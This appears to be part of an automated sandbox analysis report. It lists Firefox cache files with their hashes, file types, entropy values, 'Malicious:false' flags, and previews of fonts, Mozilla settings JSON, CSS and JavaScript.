                                                                                                                                                                                  Preview:...........iS#;.0.._a|..TM.>6t..v......`..a..y.ox.......R...g.o.L.i\.RK*.Je.R...ML..=M..$.-s...l{8.L'.n{P..u.Ks....9.5....p...oO.8...8.g..L......MK..VR.`......J2.N..6S..K.l.....L...545.u..SNM-y.q..n........<k....[..;-.S.....;.<.........4/|.+l.Z-w.(..E.X...;[.G.#.|?....H-m5."...... .84...<........H..i.3.s.~.&`.eB..S..,...M..A{.Y[.DBk8..v.}.?..6..ew..tl5c......2..9.@M.....$..Z........u1....M..WM.i5.....X.....E..`.e.S%...K?R.9.Y.i..=e.=GP..tw..j...".J.a.....Nb..W....]`.D*N.=.c.a.,X@.R}.....`e.Z?K.......|..N.....0e.....Yl.X...<...5#e.}.......$'.H.4.|..9d...........M?JUX.^...T.2....-.2cU[..D.k.~w..`1K.'..3....l<X.,r>|.+.@F.3+..3..?...&..(. .{aB....'o..:$...o..'(.k5.]s...`..4...`'....R.....A$.. ..~l.{(..E.....6q..>..G.5DmdU.`.Y'._&.y..sI..A.YdEKU......,5.M:..I.....R..u.....K..&6.;X....Y.f7........a... ".S....V.r.b._jqE.8..{q%........J.....K=./..e;..R.Vk.N/.......0.4..%.....B....9....$.....N$...x..T...$6...YtS.W.V....p+a.iw..k.."'.lp>8}m.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\2BB62A5F508187291BB477E79601AC81B652604E

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 21700, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):29973
                                                                                                                                                                                  Entropy (8bit):7.845267130638238
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:5bfiBWlRPm5fjrruYJGTiqlO3fo/tMtVpD0La83:AWLivuYJGTiqSUt+83
                                                                                                                                                                                  MD5:B065D139ED811CEBB4F3E7317AA55017
                                                                                                                                                                                  SHA1:98D9D2B086015CB2DFE2E33CBE26981666B3A699
                                                                                                                                                                                  SHA-256:4E431AE971A15262298607C40A3E80C7CB1171442CAF449754A5A86E027FB0D2
                                                                                                                                                                                  SHA-512:FB0BEBB8D0910A6B3B3E15D34578D9BAE01141DC67AFF594EFFC5F689F9FECB1B9858749E7C477160370FB7F1D30D1EBAE296F6646900DC24BB916496EF1F3E9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:wOF2......T...........T_..........................4..*....`..~..d..u.....,..$.....6.$..|. ..V..K..^.=...sp.f.m../....l\.....T.9.n..A...........2x.{P[V..v%..M...f.7..+c.cM.'...$..u.H4[?i.'..T..+.(...L...inV.@.dd....T.. }b...c.ghRA..I$.su.....`....Q.OB..S.{.#.3..o.{v.........n...]f#b.J_.......}# ..1... F........=?O.|._p........X.6.VQ.*.E..rU...}....dK.$...0.W..2i..Y...9.Y.............f{..6'....C:%.(........}.....W..._....k...|.........Y8./..e..........L......_.9..v...2F..$..y)....UWu_..T.]qE.H.b..OP...B@.4.!,F..._............z.3.*.A,h.M.(...6~_[U$.....uM2.*..qz.v.........hV\|?.......M-.h..by.A,.}.....?...52.g.,....<..s..k....h.U.]1.1..O......m......j...}6.j.v.a..R....Fj...).fO3........GSM....... ...GL..({A....$O..&'..\....:.x....{N.p8..q..iF..k...b.>....<..M..`.....d.I.5... .x...mo.L.?A(..F }./.._V.e.A.Z3.....C...h...f......(,..3....%.h'.?sG..&x..W.......b].'34.S#s...wiG.O....J.ADDDDBw.m;.....K.ti).....?.6.\.M..d.....[.z....4..D.b...6..F.....F..D.r

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\2C3960FBFCFD74D25CEDFE21C22F2F957B98AC19

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):29373
                                                                                                                                                                                  Entropy (8bit):7.449946457219104
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:QBvdHyn6DVVMpVEHVQHM2Ni9aHJnZNCK/7VqN4mApqN3Xo70tNo+pwPm082nyFzk:wW6vMkHHQ7NBUApQHkKo+pwPo2D
                                                                                                                                                                                  MD5:DBEC62BBDAE247B6D6DEE610DE0181E9
                                                                                                                                                                                  SHA1:38F2D779D53E21AC4C7BA5453C969AC1B266B9E4
                                                                                                                                                                                  SHA-256:9E42BD0D9A3051E53C06503324968A0303E7D6EC3530C8F188708D4FBF1AF4E3
                                                                                                                                                                                  SHA-512:DE1A6A66F102703A0F2946C6BABC7498164CCA23E5C0F6313CD0D277CFAD8EF093D4000DB401E0315DF6D1600E7D3957EDF125098B7F1F62674FFE09D80F918A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:. .$...C."d.........`o.f'....56..KKl..N#....@..&x...j5!@..Adl.RZk...{.{....?....*...HJ].RcH....A......6...4N.u...%u.z.m........D..1..ts..Y.a.Hz..jU>..7TY.!.....-f..q;`V..UCS|..U.y..3M.=.%..+.1..DQ>&Q..8.%.2..:.h..rS...cxf..=".k?.]....4.?.h..v^(&.o[~.!qe......A......d.......!.@.`...'..3.i/...wF....r)......R~...R.e....!....Pj.3.....Ji.K.+.k.._....m...mZ%...|.`.....z....L^K......`o....q.....b.-n..n.d.]..4..{J.|0...@._@...|>2q.._.kG6.\.2.6!9)..=;$#.ae.qK....^.Nq..>g..2...q...O+.,......QE_..(......In....?...`..u.y..v..[._kZ.....e..T1.B@$~..G..0.\.*..m...m."E.{.v.~.e..f....^.4..\~..3W..z...w.mV..,l.o.....^aW......{7...z6..}j..}..-C.....9S.....:...o..u..Cn..?\.j.]../..........p.l....~...o./AKSm..B.-b...}<..<..M_f..QIx...d.c....x]2...+&..a.a.n.....n%..).Qs..qr....R.Q. jL2.i.I.8"!4.w.4EG..}.."0..NJ.8..W..QTq....U...9..:..B...H.......Uk....~.c.X....Af.tT...V.".yC..4..vv.9..S..p.(&O.....)...[6o.w..OG.'...`r.|...o.`...x..jW.*.L... _..W...B.{.e.u!..$.v?.w.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\2CB84DD9ABB4E1485D83397C59B193094E1ABFC7

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8637
                                                                                                                                                                                  Entropy (8bit):6.102926249071529
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:tBkeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdJT0dJT9:UeLYGBRohB1r1uk/KiFTaIdaO/
                                                                                                                                                                                  MD5:4CC724D25EEB3D6AAFA8E35CEEDCD601
                                                                                                                                                                                  SHA1:91906BE686B84A89D95B503F09DF0AA41448E3F3
                                                                                                                                                                                  SHA-256:55DCEE33B03F3C51A87E9049490667A2ED060C1378C567EDFC338A67603F03DB
                                                                                                                                                                                  SHA-512:61BA3D1A0C65C932613FB6AB94377F577EA79E8C46BEAF64D545D7D2DBB0FC4B6864A8E218D7F5B0F32F1EDC749897A834EF3E2869380DAE66BBC349ACDACE3D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"signature":{"ref":"2psk5b2oconbi3m19imz2ereev","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"wBtboJXLXuNJYNue-nNcrEcwQJGIvJDIHomMWUoWe20ah9yCh8UO0nDf0QViuq9Mx6IcBAF7lX7mi_LR2vfXUrprXD-VKFKRSMGGTReFzTRTzvxy-T6tqqfxRca1pC3Y","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"displayFields":["token"],"id":"anti-tracking-url-decoration","last_modified":1708041623382}}H.V.NI........e...e...F.A.e..........:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/anti-tracking-url-decoration?_expected=1564511755134.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\2E3B3DE5D61B4B41720689C01E2CDDEB24D477FE

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (48922)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):598149
                                                                                                                                                                                  Entropy (8bit):5.34252288716915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:xsBTq1C6Qi0QeCLzTIk5raIcD6XRFls6J8c:xsB2oBvSLzhQYFlTqc
                                                                                                                                                                                  MD5:FD820CDCF5C77FEDD52EAFE6B23A093A
                                                                                                                                                                                  SHA1:597E8C08B10181D3BB308D0E79613FC9C79FE987
                                                                                                                                                                                  SHA-256:2AA368982443AB3A052E3920602EC83C416729FAE64AB4DC31077634514C8FF4
                                                                                                                                                                                  SHA-512:E9C414BCBD5150B4C549255ED182B1A96CEE8F99BF09D9915766F17E3DC554A2C117A6AD0109107A07CAB1DBBD2AC0AFCDDE80115AF8987E50B562B3950B52AC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:form{margin:0;padding:0}label{color:#606770;cursor:default;font-weight:600;vertical-align:middle}label input{font-weight:normal}textarea,.inputtext,.inputpassword{border:1px solid #ccd0d5;border-radius:0;margin:0;padding:3px}textarea{max-width:100%}select{border:1px solid #ccd0d5;padding:2px}input,select,textarea{background-color:#fff;color:#1c1e21}.inputtext,.inputpassword{padding-bottom:4px}.inputtext:invalid,.inputpassword:invalid{box-shadow:none}.inputradio{margin:0 5px 0 0;padding:0;vertical-align:middle}.inputcheckbox{border:0;vertical-align:middle}.inputbutton,.inputsubmit{background-color:#4267b2;border-color:#DADDE1 #0e1f5b #0e1f5b #d9dfea;border-style:solid;border-width:1px;color:#fff;padding:2px 15px 3px 15px;text-align:center}.inputaux{background:#ebedf0;border-color:#EBEDF0 #666 #666 #e7e7e7;color:#000}.inputsearch{background:#FFFFFF url(/rsrc.php/v3/yL/r/unHwF9CkMyM.png) no-repeat left 4px;padding-left:17px}.html{touch-action:manipulation}body{background:#fff;color:#1c1e2

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\30F34EAA36BFA2091C6F178ED9BFE29C547FB4F6

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9023
                                                                                                                                                                                  Entropy (8bit):6.116541785429678
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:xBdeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdLcdLY:ReLYGBRohB1r1uk/KiFTaIdaYk
                                                                                                                                                                                  MD5:E471F71935F3AF05386B1E2773178BF6
                                                                                                                                                                                  SHA1:4350D5D9A297BED3AA8C80314F6369E3B6A6A2DA
                                                                                                                                                                                  SHA-256:7EBD125AFE6030AFF20ED1AEC94083C3F1B1D4560586F06A94D9316CC294DC2D
                                                                                                                                                                                  SHA-512:D265A8BCB93B0ADC068D6602C76C06A234EEA615C9795D656052BC8AF25C9CC388AEB9EF8858CB3E93C617A3FF4FACC70D074C2B3C3FCE0D5C228BB97A51D897
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"id","schema":{"type":"object","title":"Language dictionaries","required":["id","dictionaries"],"properties":{"id":{"type":"string","title":"Language","description":"Identifier (eg. \"es-AR\")."},"dictionaries":{"type":"array","items":{"type":"string","minLength":1},"title":"Dictionaries","minItems":1,"description":"List of dictionaries identifiers (eg. \"es-AR@dictionaries.addons.mozilla.org\").","uniqueItems":true}}},"signature":{"ref":"oyfuwv3n2mveofpa74z6l5ap","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"-ZLHHEcEvoCb6Hva40WWIVJIMPCXKBcA8iaLGdii80Fjb4Zt9UMqMUPqEGvjiwHyWcAvwqJyCWpxMRZ1cYFJ7BFupUFBh2bLxnwBsWgLL8OhfbIrJoEzR8xBaFfwJeHs","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDV

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\33A529BC841D138C155CE5D8802DA5EA23E12731

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (11594)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):314667
                                                                                                                                                                                  Entropy (8bit):5.466328776193171
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:JRPHaQFjYx81I5e+3Uz1PlJ/yfJJubY9OD47YzD4HEBuP2IUeOkFCbPIO6I3uclq:Jh/8xm7AP2Iqn/UmxgcSDOO1s6J8+7p
                                                                                                                                                                                  MD5:39212F8F216B41AE3DD8F68C913DE421
                                                                                                                                                                                  SHA1:F906446173F837B27FD29C8DF7DF2EEB3ABA3F12
                                                                                                                                                                                  SHA-256:FB6AA54B43CDF8ACC8377CA04B99F51A1F579F16E9F8274F76C3566E435A097A
                                                                                                                                                                                  SHA-512:A360060BC5D498A4D0EDBFB5F761E05E16FD86759CAA63B50C607F304AE2BECA78C46D8789A7BC87B237930CF9FC2A8EFC42D922379DB2D0C8608CEE3A65CD13
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/.."use strict";(function(){var a=typeof globalThis!=="undefined"&&globalThis||typeof self!=="undefined"&&self||typeof global!=="undefined"&&global;if(typeof a.AbortController!=="undefined")return;var b=function(){function a(){this.__listeners=new Map()}a.prototype=Object.create(Object.prototype);a.prototype.addEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();d.has(e)||d.set(e,new Map());var f=d.get(e);f.has(b)||f.set(b,c)};a.prototype.removeEventListener=function(a,b,c){if(arguments.length<2)throw new TypeError("TypeError: Failed to execute 'addEventListener' on 'CustomEventTarget': 2 arguments required, but only "+arguments.length+" present.");var d=this.__listeners,e=a.toString();if(d.has(e)){var f=d.get(e);f.has(b)&&f["delete"](b)}};a.prototype.dispatchEvent=function(a){if

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\36E02E1B33269032456E45CE237E27B659E1E282

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8696
                                                                                                                                                                                  Entropy (8bit):6.115509005879072
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:zjBH8aeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdzYdzS:zp8aeLYGBRohB1r1uk/KiFTaIdakG
                                                                                                                                                                                  MD5:BD1BAECF26B70F920B27E308CC88BEBE
                                                                                                                                                                                  SHA1:779E3DE5AC7D0F214077263403A0CA393E3A5B64
                                                                                                                                                                                  SHA-256:0AEC41207F97F795D8212FE6B46867E891D1BCB939965B60BC3A80EF2B6F7389
                                                                                                                                                                                  SHA-512:680750A6A7C1FE5608FE52E68A27443AFE8AB1BB4724D88E1733D4DCF4E8BD24B41A2C115C81AF3E0253D6303CE83DC67CD4307328DD421CB5DEA8CC8918DB94
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"signature":{"ref":"3lu779a5jx1gi3fksd323olu5j","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"ZomKvj-vHQQ2kqflTjhYi3ZWkb0lC8LxTcNqzC-pm8xxcf5Oek4Eh5oaHWwOYeJLxGA79U55G2UeYXSxzIKdkN8DlKe0SMf_NXRWOWt_SlgC9N82q27QxCyWwTnpojJ6","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"id":"message-groups","last_modified":1708300804911},"timestamp":1697058525985,"changes":[{"type":"remote-settings","enabled":true,"frequency":{"custom":[{"cap":1,"period":15778476000}]},"userPreferences":["messaging-system.askForFeedback"],"id":"micro-surveys","last_modified":1697058525985}]}....m.........e...e...F.A.e...........:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/mes

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3745512DF8858AE920AB00BB6CB35CC364E6F4EE

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17434
                                                                                                                                                                                  Entropy (8bit):6.4282374831783935
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Te27VqN4mApqN3Xo70tNo+pwPm082nyFz/aox:WApQHkKo+pwPo26
                                                                                                                                                                                  MD5:E5FDF27EA11957967EC4DC5DF994B299
                                                                                                                                                                                  SHA1:A80F7966B70B8C5C234D49EA8AC710405EEB9624
                                                                                                                                                                                  SHA-256:8E06EDF5AAE855BFC12AEE20486DAA63264AC4B8E21B0573036F3A224E12E5FE
                                                                                                                                                                                  SHA-512:DD00BFA62A5A46447D025507732E21DBA76A1738581D40D2EF8BB83421C8D21B0F403C527A66537C0A3BF57C39BE842499F4F6A68899DE9EF8CFB140480D13B0
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.0.. ...s9...Ie..].&..y+..8..Y...(..'..w.O..wU....R..I.@3..7.{%rx<.C.u.Q..c.6o..X.3%.K..U.1....IP..Y.~.fW...V....Oe....YX.u.x..(.H....SY...u..mv.."./..d..(..lT.J....K..j...:L"..C.N.M`.=(`..=+..@....!0.g...*.....H...u.^.K...P.._.XYk.)......>Mb.miv.+...<...e.#.1.^.....W..1...H.W`.u......0.mR8J.x.+...w...0(.S...../.N.G...7m.[....`.&.-.*0.Bwe;.6`.(.H.?.J.,..qt&..Z...;. a...e".q.f....`...!.F.<..$C7tY.d)..M.?.h.s..4._....C.....`.){..3.....w.3.....a...-n..u.CY'....3.(J......[.q..r<..Y...l.k[:.........s..1.>'.E7..z)..N$..k.=.tE.6.i..Ez...N..eY....c..../|.C.%...s... ....R...o.4.o.Rp.".zd./gz].l.........u...A..&....8j-......|p.U...b~.y6.{o...8.E..v..O8.?...n..h.v.w.c.9j."...k........MW.cnnM...M..5a.u.....*.... !...,..=..aD h..Ms....[.<.M....uD...3...pR..y.=^........Q......t.[KA....x..|.........Q{.wNn..............9..U....!{[.G.Y1.....Z..)u.i0U.7y..6.W.'.....?.....$.....1....V..D.E..Ia,$..P..PP.F..O.,X.=..0.G._..-........o.sn..SI.....t.y....c....Vp......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\39D80535A21E286B3C662765C5F09ACEB927E77D

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8593
                                                                                                                                                                                  Entropy (8bit):6.101884017804886
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:BSBreyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdoJhdoJc:BgeLYGBRohB1r1uk/KiFTaIdamr
                                                                                                                                                                                  MD5:EFA07930F2A3BFEE918D0A797C4DDAE2
                                                                                                                                                                                  SHA1:9ECFAAC07E5841EC86F9602B9D1935B2C690C92B
                                                                                                                                                                                  SHA-256:441D8FB4ED1A0772D7C00F1BFFB7E3D94ACF2FC2080C70742497EAD09427432F
                                                                                                                                                                                  SHA-512:78226DCA65C20B8D0549B7A589157FB07243DC75BEEAD90E2701BBEA214DEA9C466CAD732B7F3B867EE1AE76E8809862798935AABE54BA3E07BEE9D1F5F543BA
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"signature":{"ref":"uk54naxl030tsgxcuwhps8se","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"JZraJ9ASi0XXQY8x_A-U3RGk9BC0fUY6kr4YcdGpe1mHIz_wrYRVifKxGdM6W9iIfcDvKpLfzleukXlrJayzhQTTOpxeheZkw7l-S_qHXVcp3o2wClnoPd9XorGQ3bbx","signer_id":"remote-settings","public_key":"MHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE9/8sqFZ+dU3XKZO6K+T1Ez9wiWI18wv2atOP1JBioLK9RDzM+2lP3hcnmkdKPoF54BBcrrUruEYcLg7gsw2EWoqGzqOXmUVf5aDVfUHQxV8aW4x3H/oT0qGFXgDFHb+t"},"id":"sites-classification","last_modified":1708041624154}}o.zu..........e...e...F.A.e.....w....:https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/sites-classification?_expected=1544035467383.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAXxMI

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3A0CE443575ADF028E0CA01F3D9EBA9AD13E0529

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9614
                                                                                                                                                                                  Entropy (8bit):6.277520957713529
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:rkiYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0AxknKN3jKN3k:rkhmzwTWvoglJmzwTWvogrBHJm2OdAn0
                                                                                                                                                                                  MD5:28CAE22A9A65DB1A71298BE1CF82EB69
                                                                                                                                                                                  SHA1:0639201650A972AA270D32DB026828440969F892
                                                                                                                                                                                  SHA-256:DD955481C07CCE84EF851FF9E5579E539FCE09AF11BEB6F344CF5E6317E98FA9
                                                                                                                                                                                  SHA-512:B9AFC5897D1286BD07227CA2C879C79D25FEB134204F6A7471DAE74081737AC3AE01F4FB16B5FDB59AE6B6FB0B5FBE0DE4242D049C1658B9AD5B2DD7E441D022
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.`...8...N..6.(b.*.7pc./043..L.y.t.....Q..=<......hJY`k.Z.-;......Q`.$.B...E.x.Qc._.../.....YY..'.UN..j.^.|,..........dX.......C....&..*FO.M...-A........F.m1.6J....b.I.......O.5d....|...Vz.E.+L...C...cs......?E...PMfE...m.3).....$MB.r.....]9.....:0.a#.....h..U.f&b.B....A,..bMg.sN..2..`pj..{.......,%*.....~..&q..899.b.}4.a.\..5.;..}R.r.O........w.x.%0.A.9.h.d..<..c%..0....+.B...._#.#.,*w.......!..g.a........e...e...F.+.g.._...q....O^partitionKey=%28https%2Cgoogle.com%29,:https://www.gstatic.com/images/branding/productlogos/googleg/v6/36px.svg.necko:classified.1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAASqMIIEpjCCA46gAwIBAgIRAIAqV/We56bUCWQ28HDF/kAwDQYJKoZIhvcNAQELBQAwRjELMAkGA1UEBhMCVVMxIjAgBgNVBAoTGUdvb2dsZSBUcnVzdCBTZXJ2aWNlcyBMTEMxEzARBgNVBAMTCkdUUyBDQSAxQzMwHhcNMjQwMTI5MDgxOTQwWhcNMjQwNDIyMDgxOTM5WjAYMRYwFAYDVQQDDA0qLmdzdGF0aWMuY29tMFkwEw

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3AD2553033F2FDF3452381EC30CB5BE655BDD9BA

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):19598
                                                                                                                                                                                  Entropy (8bit):5.895382952367393
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:qQbwapzh6fBPSgVzZFQKeLYGBRohB1r1uk/KiFTaIdaym:qQbwapzAfBPSg5nQKe8GvIDuuKOa8y
                                                                                                                                                                                  MD5:8DA3C83FA8E038CC5534E524BEB8111A
                                                                                                                                                                                  SHA1:5DE2579BE55729C7C4AD4BBDEAC70CF91EB181CD
                                                                                                                                                                                  SHA-256:B5C87B00D6FD37F9C2B8DB59B788A537E088496B1C02E296A9861E4E468B2B83
                                                                                                                                                                                  SHA-512:03537071DBC68A8C8912658BCE84B69EFCD0B7E4DBA4BA7FB844473BA400766BE4A44F9242DB50AA2CE6BDDDFD1EAC1985ABF0DC4EF6BD4637473E2D7FB1F807
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["telemetryId","searchPageRegexp","queryParamName"],"properties":{"taggedCodes":{"type":"array","items":{"type":"string","pattern":"^[a-zA-Z0-9-._]*$"},"title":"Partner Codes","description":"An array of partner codes to match against the parameters in the url. Matching these codes will report the SERP as tagged."},"telemetryId":{"type":"string","title":"Telemetry Id","pattern":"^[a-z0-9-._]*$","description":"The telemetry identifier for the provider."},"organicCodes":{"type":"array","items":{"type":"string","pattern":"^[a-zA-Z0-9-._]*$"},"title":"Organic Codes","description":"An array of partner codes to match against the parameters in the url. Matching these codes will report the SERP as organic."},"codeParamName":{"type":"string","title":"Partner Code Parameter Name","description":"The name of the query parameter for the partner code."},"queryParamName":{"type":"string","title":"Search Query Parameter Name","d

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\3ADEBC46DAEA2D77E1DF4B4AB6C524084F97786F

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ISO Media, Apple iTunes ALAC/AAC-LC (.M4A) Audio
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):21806
                                                                                                                                                                                  Entropy (8bit):6.147496409368541
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:V6nEWRLZ7a7VqN4mApqN3Xo70tNo+pwPm082nyFz/cRGR6:VKLZTApQHkKo+pwPo2p
                                                                                                                                                                                  MD5:4395EE77F2AC5FEF5A91DB46A5ED77EE
                                                                                                                                                                                  SHA1:100BD363ED8DCC33369DA75D3F3EC59DAA5DA0B2
                                                                                                                                                                                  SHA-256:283157AC997686BB0D98D76FD3FB1BFFD4F705015C4C2C08B473A6C83961FDE7
                                                                                                                                                                                  SHA-512:C70F99A00337E9B4ECE98AF2B3C07BB3398B3DC247C8BFAFB509EF25EB141198285A296E98C391634ED9E861D9CD1560EB82E77B565785868439EE04EA5E45A6
                                                                                                                                                                                  Malicious:false
